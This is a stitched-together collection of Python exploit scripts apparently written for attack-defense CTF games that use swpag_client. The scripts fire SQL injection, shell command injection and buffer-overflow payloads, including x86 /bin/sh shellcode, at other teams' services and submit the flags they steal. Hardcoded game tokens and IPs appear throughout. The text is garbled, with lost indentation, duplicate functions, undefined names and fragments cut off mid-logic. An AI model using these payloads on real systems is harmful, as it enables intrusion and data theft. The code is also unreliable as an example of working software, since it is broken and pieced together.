def run(args):
from re import search
from subprocess import Popen, PIPE, STDOUT
import swpag_client
# Retrieve the list of flag targets for this tick for service 5 (configuration)
t = swpag_client.Team("http://34.195.187.175", "f67634a9373be60a439287965e1d8562")
flask_flags = t.get_targets(2)
for target in flask_flags:
team = target['hostname']
flag_id = target['flag_id']
# Make sure we're not trying to hack ourselves or the test accounts
if team in ["team9", "team11", "team12"]:
print("Skipping {0}".format(team))
continue
print("Trying {0} with flag_id {1}...".format(team, flag_id))
# Use curl to create a kid with a maliciously crafted last name that will exploit
# a SQL injection vulnerability. Specifically, it will find the invitation for the
# party ID that corresponds to the flag.
kid_query = "Last'%20UNION%20SELECT%20invitation%20AS%20data%20FROM%20parties%20WHERE%20id%3D{0};--".format(flag_id)
p = Popen(["curl", "-s", "{0}:10002/kid?age=8&first=First&last={1}".format(team, kid_query)], stdout=PIPE)
# Read the response and get the ID of the kid we just created
out = p.stdout.readline().decode()
m = search("Created kid (\d+)", out)
if m == None:
continue
# Now use the /find endpoint to ask the service which parties our kid is
# attending. This triggers the SQL exploit.
find_query = "{0}:10002/find?kid={1}".format(team, m.group(1))
p = Popen(["curl", "-s", find_query], stdout=PIPE)
# Read output and find the party invitation
out = p.stdout.readline().decode()
m = search("Found kid at these parties: (\w+)", out)
if m == None:
continue
# Use the party invitation to query for the party data from the /info endpoint
info_query = "{0}:10002/info?id={1}&invitation={2}".format(team, flag_id, m.group(1))
p = Popen(["curl", "-s", info_query], stdout=PIPE)
# Read the output and get the flag from the party's description field
out = p.stdout.readline().decode()
m = search("Party \[(\w+)\]", out)
if m == None:
continue
# Send the flag to the scoring service
result = t.submit_flag([m.group(1)])
print("Submitting flag {0} for team {1}: {2}".format(m.group(1), team, result))
def main():
try:
team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN)
#print(team.get_targets(SERVICE_ID))
EXCLUDE_HOSTNAMES = [EXCLUDE_TEAM_NAME, "localhost"]
for target in team.get_targets(SERVICE_ID):
try:
# Ignore our own team
if target["hostname"] in EXCLUDE_HOSTNAMES:
continue
flag_id = target["flag_id"]
hostname = target["hostname"]
port = target["port"]
print("Running exploit on {0}:{1} -> {2}".format(
hostname, port, flag_id))
flag_obtained = None
process = pwn.remote(hostname, 10004)
process.readuntil('id ')
x = process.readuntil(')')
x = x[0:10]
pwn.enhex(x)
try:
x = int(x) - 36 - 88
z = hex(x)
except Exception as e:
process.close()
continue
y = pwn.p32(x)
process.readuntil('?')
process.write('R\n')
process.readuntil('password\n')
process.write('\n')
process.write('12345')
process.send('\n')
process.write((b'\x90' * 20) + (
b'\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x16\x58\xd1\xe8\xcd\x80'
) + (b'\x90' * 30) + y + (b'\x44' * 20))
process.send('\n')
process.send('\n')
print(process.readuntil('password!'))
process.send('\n')
process.send('\n')
print('cat ' + target['flag_id'])
print(process.send("cat " + target["flag_id"] + "\n"))
aaaa = process.recvall(timeout=2).strip("\r\n")
print(team.submit_flag([aaaa]))
process.close()
except Exception as e:
process.close()
continue
except Exception as e:
print(e)
def main():
try:
team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN)
vm_info = team.get_vm()
for key, value, in vm_info.items():
print("{0}: {1}".format(key, value))
except Exception as e:
print(e)
def run(args):
team_uri = 'http://' + args.team_ip + '/'
flag_token = args.flag_token
print('Team IP: ' + team_uri)
print('Team Flag: ' + flag_token)
try:
t = swpag_client.Team(team_uri, flag_token)
print(t.get_vm())
except:
print("Unable to get VM info!")
def main():
try:
with open("./flag-submitter.txt", "r") as flags_file:
all_flags = flags_file.read().splitlines()
team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN)
print(all_flags)
success = team.submit_flag(all_flags)
print(success)
except Exception as e:
print(e)
def run(args):
import swpag_client
serviceid = args.serviceid
t = swpag_client.Team("http://34.195.187.175",
"f67634a9373be60a439287965e1d8562")
flags = t.get_targets(int(serviceid))
for target in flags:
team = target['hostname']
flag_id = target['flag_id']
print("Team: {0}, FLAG: {1}".format(team, flag_id))
def run(args):
team_uri = 'http://' + args.team_ip + '/'
flag_token = args.flag_token
flag = args.flag
print('Team IP: ' + team_uri)
print('Team Flag: ' + flag_token)
print('Attempted Flag: ' + flag)
try:
t = swpag_client.Team(team_uri, flag_token)
print(t.submit_flag([flag]))
except:
print("Unable to submit flag!")
def main():
try:
team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN)
TARGET_IDS = team.get_service_list()
for target_id in TARGET_IDS:
target_info = team.get_targets(target_id['service_id'])
#target_info = team.get_targets(1)
for target in target_info:
print(f"Team name:{target['team_name']}")
print(f"Host name:{target['hostname']}")
print(f"Port:{target['port']}")
print(f"Flag Id:{target['flag_id']}")
except Exception as e:
print(e)
def main():
try:
team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN)
for target_id in TARGET_IDS:
target_info = team.get_targets(target_id)
for target in target_info:
print(target['team_name'])
print(target['hostname'])
print(target['port'])
print(target['flag_id'])
except Exception as e:
print(e)
def main():
try:
team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN)
for target in team.get_targets(SERVICE_ID):
# Ignore our own team
if (target["team_name"] == EXCLUDE_TEAM_NAME):
continue
flag_id = target["flag_id"]
hostname = target["hostname"]
port = target["port"]
print("Running exploit on {0}:{1} -> {2}".format(
hostname, port, flag_id))
flag_obtained = None
# Put exploit here and (hopefully) update the "flag_obtained" variable above!
# Don't forget logic for if the service is patched or offline!
# Otherwise a hang could be fatal. This can be as simple as wrapping your exploit logic in a try/except block.
'''This is the example from the live event, using pwn tools.
r = pwn.remote(target['hostname'], 10001)
r.recvuntil("username:"******"sh\n")
r.recvuntil("password:"******"pwned\n")
r.recvuntil("work:")
r.send("pwned\n")
r.recvuntil("result")
r.send("S\n")
r.recvuntil("end\n")
r.send("V0=V-8+0\n")
r.send("V1=V0+10641\n")
r.send("V2=V0+130\n")
r.send("V-1073741792=V2+0\n")
r.send("V-1073741791=V1+0\n")
r.send("\n")
r.send("cat /home/chall/service/rw/"+target['flag_id'] + "_*")
flag_obtained = r.read(4096).split("\n")[0]
print(flag_obtained)
'''
if (flag_obtained is not None):
print(team.submit_flag([flag_obtained]))
except Exception as e:
print(e)
#!/usr/bin/env python3
import swpag_client
import optparse
def get_argument():
parser = optparse.OptionParser()
parser.add_option("-i", "--team-interface", dest="team_interface", help = 'Team interface on CTF game')
parser.add_option("-t", "--flag-token", dest="flag_token", help = 'Flag token')
parser.add_option("-f", "--stolen-flags", dest="stolen_flags", help = 'File of stolen flags, a flag in each line')
(options, arguments) = parser.parse_args()
if not options.team_interface:
parser.error("[-] Please specify Team interface, use --help for more info.")
elif not options.flag_token:
parser.error("[-] Please specify Flag Token, use --help for more info.")
elif not options.stolen_flags:
parser.error("[-] Please specify a file contains list of flags to submit, use --help for more info.")
return options
if __name__ == "__main__":
options = get_argument()
ctf_game = swpag_client.Team("http://"+options.team_interface, options.flag_token)
flags_file = open(options.stolen_flags, 'r')
flag_lines = flags_file.readlines()
for flag in flag_lines:
print(ctf_game.submit_flag(["{}".format(flag.strip())]))
#
# Description: This script will sniff the local network looking for trafic
# going to the scoring machine and will attempt to extract the flags
# from the payload of the message.
#====================================================
import swpag_client
import sys
import getopt
import string
import scapy.all as scapy
url = 'http://54.241.76.20'
token = '66978175b387ba7b6dee386d16b40b29'
team_object = swpag_client.Team(url, token)
interface = ""
scoreboard_ip = ""
our_machine_ip = ""
def scoreboard_sniffer(packet):
print('Found a packet')
flag = ""
# Extract flag from packet
# Dependent on the format of the flags and messages.
team_object.submit_flag(flag)
#!/usr/bin/env python3
import swpag_client
from pwn import *
t = swpag_client.Team('http://34.211.129.130', 'AxuE8hQPxgquUdetEO3P')
teams = t.get_targets(1)
for team in teams:
if (team['hostname'] == 'team13' or team['hostname'] == 'team14'
or team['hostname'] == 'team15' or team['hostname'] == 'team20'
or team['hostname'] == 'team22'):
try:
r = remote(team['hostname'], 10001)
r.recvuntil('(3) Exit.')
r.send('2\n')
r.recvuntil('Select a name for your backup:')
r.send('a\n')
r.recvuntil('Choose a secure password for your backup:')
exploit = ("a; /bin/sh; a\n")
# print(exploit)
r.send(exploit)
# r.recvuntil('Here is your backup data that was stored securely:')
print("First line: " + str(r.recv()))
print("Second line: " + str(r.recv()))
ls_file = str("ls | grep " + team['flag_id'] + '\n')
r.send(ls_file)
get_file = r.recv()
get_file = get_file.decode()
print("File: " + str(get_file))
open_file = ('cat ' + str(get_file) + '\n')
r.send(open_file)
ctf_threads.append(x)
except:
module_logger.error('Error Taking Dump')
time.sleep(current_tick['approximate_seconds_left'] + 1)
for service in services:
x = ctf_threads.pop()
x.kill_process()
if __name__ == '__main__':
parsed_arguments = arguement_parser.parse_args()
if parsed_arguments.game_interface_url is None or parsed_arguments.auth_token is None:
module_logger.error(arguement_parser.usage)
exit()
try:
TeamClient = swpag_client.Team(parsed_arguments.game_interface_url,
parsed_arguments.auth_token)
# print(json.dumps(,indent=4))
curr_tick_info = TeamClient.get_game_status()['tick']
end_date = datetime.strptime(curr_tick_info['ends_on'],
'%Y-%m-%d %h:%m%s')
if end_date > datetime.datetime.now():
module_logger.info("Game Has Ended On %s",
curr_tick_info['ends_on'])
TeamClient.get_game_status()
run_service(TeamClient, parsed_arguments.interface,
parsed_arguments.output_dir)
except:
module_logger.error("Game Client Not Connecting")
exit()
def run(args):
from re import search
from subprocess import Popen, PIPE, STDOUT
import swpag_client
from threading import Timer
# Retrieve the list of flag targets for this tick for service 5 (configuration)
t = swpag_client.Team("http://34.195.187.175",
"f67634a9373be60a439287965e1d8562")
backup_flags = t.get_targets(1)
for target in backup_flags:
team = target['hostname']
flag_id = target['flag_id']
# Make sure we're not trying to hack ourselves or the test accounts
if team in ["team9", "team11", "team12"]:
print("Skipping {0}".format(team))
continue
try:
print("Trying {0}...".format(team))
# Spin up an nc process for the service and a timer. The timer is a
# fallback mechanism to ensure the process doesn't hang if we get
# into an unexpected situation.
p = Popen(["nc", team, "10001"], stdout=PIPE, stdin=PIPE)
tt = Timer(3, p.kill)
tt.start()
# Send our maliciously crafted input to trick the backup service into
# running ls on its storage directory, piped into grep to find the flag
# file that we're looking for. The second half of the file name is the password.
out = str(
p.communicate(input="2\na;ls | grep {0};\n\n\n".format(
flag_id).encode()))
m = search("\w{20}_(\w{20})", out)
if m == None:
continue
# Now use a new nc process to connect and read the file with the password
# we found in the previous step. The contents will be the flag.
p = Popen(["nc", team, "10001"], stdout=PIPE, stdin=PIPE)
out = str(
p.communicate(input="2\n{0}\n{1}\n\n\n".format(
flag_id, m.group(1)).encode()))
m = search("(FLG\w+)Hello", out)
if m == None:
continue
# Send the flag to the scoring service, then cancel the timer since
# we no longer need it.
result = t.submit_flag([m.group(1)])
tt.cancel()
print("Submitting flag {0} for team {1}: {2}".format(
m.group(1), team, result))
except:
print("Error")
def main():
try:
team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN)
os.system("rm -rf temp && mkdir temp")
for target in team.get_targets(SERVICE_ID):
# Ignore our own team
if (target["team_name"] == EXCLUDE_TEAM_NAME):
continue
flag_id = target["flag_id"]
hostname = target["hostname"]
port = target["port"]
print("Running exploit on {0}:{1} -> {2}".format(
hostname, port, flag_id))
flag_obtained = None
# Put exploit here and (hopefully) update the "flag_obtained" variable above!
# Don't forget logic for if the service is patched or offline! Otherwise a hang could be fatal, this can be as simple as wrapping your exploit logic in a try/except block
'''This is the example from the live event, using pwn tools.
r = pwn.remote(target['hostname'], 10001)
r.recvuntil("username:"******"sh\n")
r.recvuntil("password:"******"pwned\n")
r.recvuntil("work:")
r.send("pwned\n")
r.recvuntil("result")
r.send("S\n")
r.recvuntil("end\n")
r.send("V0=V-8+0\n")
r.send("V1=V0+10641\n")
r.send("V2=V0+130\n")
r.send("V-1073741792=V2+0\n")
r.send("V-1073741791=V1+0\n")
r.send("\n")
r.send("cat /home/chall/service/rw/"+target['flag_id'] + "_*")
flag_obtained = r.read(4096).split("\n")[0]
print(flag_obtained)
'''
os.system(
"curl -m 2 \"{0}:10003/kid?first=%25&last=%25'%20UNION%20SELECT%20description%20AS%20data%20from%20parties;--&age=1\" > temp/results{1}.txt"
.format(hostname, hostname))
x = None
with open("temp/results{0}.txt".format(hostname), "r+") as f:
x = f.readline()
x = x[12:]
os.system(
"curl -m 2 \"{0}:10003/find?kid={1}\" > temp/results_flags{2}.txt"
.format(hostname, x.strip("\r\n"), hostname))
y = None
with open("temp/results_flags{0}.txt".format(hostname), "r+") as f:
y = f.readline()
y = y[28:]
y = y.split(",")
for flg in y:
try:
x = int(flg)
except ValueError as e:
if ("FLG" in flg):
print(team.submit_flag([flg]))
if (flag_obtained is not None):
print(team.submit_flag([flag_obtained]))
except Exception as e:
print(e)
# print(t.submit_flag([data[-17:-1].decode('utf-8')]))
c.close()
return data[-17:-1].decode('utf-8')
svcmap = {
10001: [backup1],
10002: [],
10003: [],
10004: [],
10005: [config1]
}
team = swpag_client.Team(team_url, team_password)
def main_worker(d, targ, svc):
# team_name, hostname, port, flag_id
team_name = targ["team_name"]
hostname = targ["hostname"]
port = targ["port"]
flag_id = targ["flag_id"]
print("Beginning Attack on " + str(team_name) + ", " + str(hostname) + ", " + str(flag_id))
if attack_teams and team_name not in attack_teams:
print("Team " + str(team_name) + " not in attack list. Returning.")
return # skip this team
for i, enabled in enumerate(enabled_attacks[svcid]):
def run(args):
from re import search
from subprocess import Popen, PIPE, STDOUT
from threading import Timer
import swpag_client
# Retrieve the list of flag targets for this tick for service 5 (configuration)
t = swpag_client.Team("http://34.195.187.175",
"f67634a9373be60a439287965e1d8562")
config_flags = t.get_targets(5)
for target in config_flags:
try:
team = target['hostname']
flag_id = target['flag_id']
# Make sure we're not trying to hack ourselves or the test accounts
if team in ["team9", "team11", "team12"]:
print("Skipping {0}".format(team))
continue
print("Trying {0}...".format(team))
# Spin up an nc process for the service and a timer. The timer is a
# fallback mechanism to ensure the process doesn't hang if we get
# into an unexpected situation.
p = Popen(["nc", team, "10005"], stdout=PIPE, stdin=PIPE)
tt = Timer(1.5, p.kill)
tt.start()
# Read output until we get to the prompt
for i in range(0, 15):
out = p.stdout.readline().decode()
if "or (q)uit" in out:
break
# Send the commands to define our malicious config variable, then ask
# the service to save it to a file.
p.stdin.write(
"d\na\n$({{cat,config_{0}}})\ns\n".format(flag_id).encode())
p.stdin.flush()
# Read output until we find the line telling us the name of our file
for i in range(0, 15):
out = p.stdout.readline().decode()
m = search("config_(\w+)!", out)
if m != None:
break
if m == None:
continue
# Load the file, then view our variables. This executes the 'cat'
# command we put in our crafted variable
p.stdin.write("l\nconfig_{0}\nv\n".format(m.group(1)).encode())
p.stdin.flush()
# Read output until we find the flag
for i in range(0, 30):
out = p.stdout.readline().decode()
m = search("CONFIG_flag=(\w+)", out)
if m != None:
break
if m == None:
continue
# Send the flag to the scoring service, then cancel the timer since
# we no longer need it.
result = t.submit_flag([m.group(1)])
tt.cancel()
print("Submitting flag {0} for team {1}: {2}".format(
m.group(1), team, result))
except:
print("Error")
def main():
try:
team = swpag_client.Team(TEAM_URL, TEAM_FLAG_TOKEN)
for target in team.get_targets(SERVICE_ID):
# Ignore our own team
if (target["team_name"] == EXCLUDE_TEAM_NAME):
continue
flag_id = target["flag_id"]
hostname = target["hostname"]
port = target["port"]
print("Running exploit on {0}:{1} -> {2}".format(
hostname, port, flag_id))
flag_obtained = None
# Put exploit here and (hopefully) update the "flag_obtained" variable above!
# Don't forget logic for if the service is patched or offline! Otherwise a hang could be fatal, this can be as simple as wrapping your exploit logic in a try/except block
'''This is the example from the live event, using pwn tools.
r = pwn.remote(target['hostname'], 10001)
r.recvuntil("username:"******"sh\n")
r.recvuntil("password:"******"pwned\n")
r.recvuntil("work:")
r.send("pwned\n")
r.recvuntil("result")
r.send("S\n")
r.recvuntil("end\n")
r.send("V0=V-8+0\n")
r.send("V1=V0+10641\n")
r.send("V2=V0+130\n")
r.send("V-1073741792=V2+0\n")
r.send("V-1073741791=V1+0\n")
r.send("\n")
r.send("cat /home/chall/service/rw/"+target['flag_id'] + "_*")
flag_obtained = r.read(4096).split("\n")[0]
print(flag_obtained)
'''
r = pwn.remote(target["hostname"], 10001)
print(r.recvuntil("Exit.\n> "))
r.send("2\n")
print(r.recvuntil("backup: "))
r.send("name\n")
print(r.recvuntil("backup: "))
r.send(";cat *;\n")
a = r.recvall(timeout=2)
r.close()
a = a.split("FLG")
if len(a) < 1:
continue
z = []
for potential_flag in a:
if a.index(potential_flag) == len(a) - 1:
continue
z.append("FLG" + potential_flag)
if len(z) >= 50:
print(team.submit_flag(z))
z = []
continue
a = a.split("\n")
for line in a:
if not line.endswith(".secure.bak"):
continue
b = line[:-11]
if len(b.split("_")) < 2:
continue
b = b.split("_")[1]
if not b.startswith("FLG"):
continue
print(team.submit_flag([b]))
if (flag_obtained is not None):
print(team.submit_flag([flag_obtained]))
except Exception as e:
print(e)
#!/usr/bin/python
import sys
import swpag_client
print("Welcome!")
t = swpag_client.Team('http://52.52.83.248', 'pc9Zhk3DDDV9Y5ILrUs2')
flag = input("Input flag: ")
print(t.submit_flag(['%s']), flag)
# print("Submit flag: %s", str(sys.argv[1]))
def run(args):
from re import search
from subprocess import Popen, PIPE, STDOUT
import swpag_client
from threading import Timer
# Retrieve the list of flag targets for this tick for service 5 (configuration)
t = swpag_client.Team("http://34.195.187.175",
"f67634a9373be60a439287965e1d8562")
tweety_flags = t.get_targets(4)
for target in tweety_flags:
team = target['hostname']
flag_id = target['flag_id']
# Make sure we're not trying to hack ourselves or the test accounts
if team in ["team9", "team11", "team12"]:
print("Skipping {0}".format(team))
continue
try:
print("Trying {0}...".format(team))
# Spin up an nc process for the service and a timer. The timer is a
# fallback mechanism to ensure the process doesn't hang if we get
# into an unexpected situation.
p = Popen(["nc", team, "10004"], stdout=PIPE, stdin=PIPE)
tt = Timer(3, p.kill)
tt.start()
# Try to read input until we get to the prompt, then choose to read
# a tweet ('R' command)
p.stdout.readline().decode()
p.stdout.readline().decode()
p.stdout.readline().decode()
p.stdin.write("R\n".encode())
p.stdin.flush()
# Read the next line of input to get to the second prompt, then send
# a malicously crafted string that will trigger a buffer overflow and
# effectively bypass the password check.
p.stdout.readline().decode()
p.stdin.write(
"{0} AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
.format(flag_id).encode())
p.stdin.flush()
# Read the response and parse out the flag value
out = p.stdout.readline().decode()
m = out.replace("Note content: ", '')
m.strip()
m.replace('\n', ' ').replace('\r', '')
# Send the flag to the scoring service, then cancel the timer since
# we no longer need it.
result = t.submit_flag([m[0:16]])
tt.cancel()
print("Submitting flag {0} for team {1}: {2}".format(
m[0:16], team, result))
except:
import sys
e = sys.exc_info()[0]
print("Exception: {0}".format(e))
def getSWPAGFlags(args):
t = swpag_client.Team(args.teamIp, args.teamToken)
# Get the exploits per server
serviceExploits = readSWPAGFile(args.file)
services = serviceExploits.keys()
# Get the status and only run on a new tick
status = t.get_game_status()
if current_tick < status['tick_id']:
current_tick = status['tick_id']
f = open(args.logFile, "a")
now = time.time()
timestamp = datetime.fromtimestamp(now).strftime('%Y-%m-%d %H:%M:%S')
f.write('Connecting to ' + args.teamIp + ' during tick ' +
current_tick + ' at timestamp ' + timestamp)
f.close()
# determine targets
tick_services = t.get_service_list()
for service in tick_services:
service_name = service['service_name']
targets = t.get_targets(service['service_id'])
for target in targets:
if target['hostname'] != args.ignoreHost:
target_host = target['hostname']
target_port = target['port']
target_id = target['flag_id']
payload = None
if service_name in services:
payload = serviceExploits[service_name]
# connect to target machine and send exploit
if payload is not None:
f = open(args.logFile, "a")
now = time.time()
timestamp = datetime.fromtimestamp(now).strftime(
'%Y-%m-%d %H:%M:%S')
f.write('Targeting ' + target['team_name'] +
' service ' + service_name)
f.close()
tc = connect(target_host, target_port)
time.sleep(0.5)
tc.shutdown(socket.SHUT_WR)
# Now read in flags
subrpocess.call(
"function slowcat() { while read; do sleep .05; echo \"$REPLY\"; done;}",
shell=True,
executable='/bin/bash')
data = subprocess.check_output(
f"cat {payload} | slowcat | nc {target_host} {target_port}",
shell=True,
executable='/bin/bash')
output = data.decode("utf-8")
flag = output.replace("\n", "")
result = t.submit_flag([flag])
f = open(args.logFile, "a")
now = time.time()
timestamp = datetime.fromtimestamp(now).strftime(
'%Y-%m-%d %H:%M:%S')
f.write('Tried to submit token for ' +
target['team_name'] + ' got result ' + result)
f.close()
if args.slackChannel and args.slackToken:
sendSlackMessage(
args.slackChannel, args.slackToken,
'Submitted token for ' + target['team_name'] +
' got result: ' + result)
c.sendline("l")
c.recvline()
c.sendline("config_"+filename)
data = c.recvline()
c.sendline("cat config_"+ flag_id )
data = c.recvline()
data = c.recvline()
print(t.submit_flag([data[-17:-1].decode('utf-8')]))
c.close()
return data
url='http://34.195.187.175'
token= '66978175b387ba7b6dee386d16b40b29'
t = sc.Team(url, token);
targets = t.get_targets(5)
for target in targets:
print(target['hostname'])
print(target['flag_id'])
if target['hostname'] == 'team10':
print("team5")
elif target['hostname'] == 'team6':
print("team9")
elif target['hostname'] == 'team7':
print("team7")
else :
try:
get_flag(target['hostname'],10005,target['flag_id'],'token',t)
except:
c.sendline("l")
c.recvline()
c.sendline("config_"+filename)
data = c.recvline()
c.sendline("cat config_"+ flag_id )
data = c.recvline()
data = c.recvline()
c.close()
return data[-17:-1].decode('utf-8')
map = {10005: [vulnerability1]}
team = swpag_client.Team(game_link, game_token)
def launch_vul(id, targ, svc):
team_name = targ["team_name"]
hostname = targ["hostname"]
port = targ["port"]
flag_id = targ["flag_id"]
if other_teams and team_name not in other_teams:
return; # Don't do anything here
for i, buf in enumerate(vulnerability[svcid]):
if not enabled:
continue
buf1 = map[svcid][i]
flag = buf1(hostname, port, flag_id)
